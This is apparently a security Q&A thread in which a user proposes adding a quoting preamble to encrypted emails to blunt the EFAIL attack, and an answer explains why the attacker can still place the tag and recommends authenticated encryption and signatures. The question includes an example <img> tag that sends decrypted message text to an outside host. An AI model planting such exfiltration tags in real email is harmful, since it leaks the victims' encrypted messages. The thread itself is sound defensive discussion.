6

The way I understand EFAIL, the attack works because email clients can be coerced into concatenating the decrypted message into text supplied by the attacker to result in an URL.

But wouldn't it be a counter-measure to use a suitable preamble with each secret message sent, such as

nice try " '
Secret meeting 
Tomorrow 9pm

? The way I understand the attack(s), this would result in something like

<img src="http://efail.de/nice%20try%" ' Secret meeting Tomorrow 9pm">

i.e., an img tag that is probably not even valid and exfiltrates only the initial "nice try" to the attacker.

Mike Ounsworth
  • 57,707
  • 21
  • 150
  • 207
Hagen von Eitzen
  • 1,098
  • 8
  • 19

1 Answers1

5

That may work on some naive EFAIL attacks, but

  1. the last page of the EFAIL whitepaper lists a number of known variants of EFAIL; most - but not all - rely on malicious HTML tags and quote characters. (Note in particular the last one that does it through the email headers.)
  2. My understanding is that due to how AES_CBC works, the attacker gets to choose where in the email to insert the malicious <img> tag, so once they figure out your trick, they would insert it after the nice try " '.

Generally speaking, attacks like this are best thwarted by addressing the root cause rather than applying band-aid fixes in a never-ending game a whack-a-mole.

In the case of EFAIL, the root cause is email clients that render HTML content and follow external links even on untrusted content. The proper solution is for email client vendors to be more careful about using authenticated encryption (AES_GCM) and digital signatures.

The current behaviour of most email clients when a signature validation fails is to render the email, but put a warning banner at the top. I wonder if we will see that change as a result of EFAIL?

Mike Ounsworth
  • 57,707
  • 21
  • 150
  • 207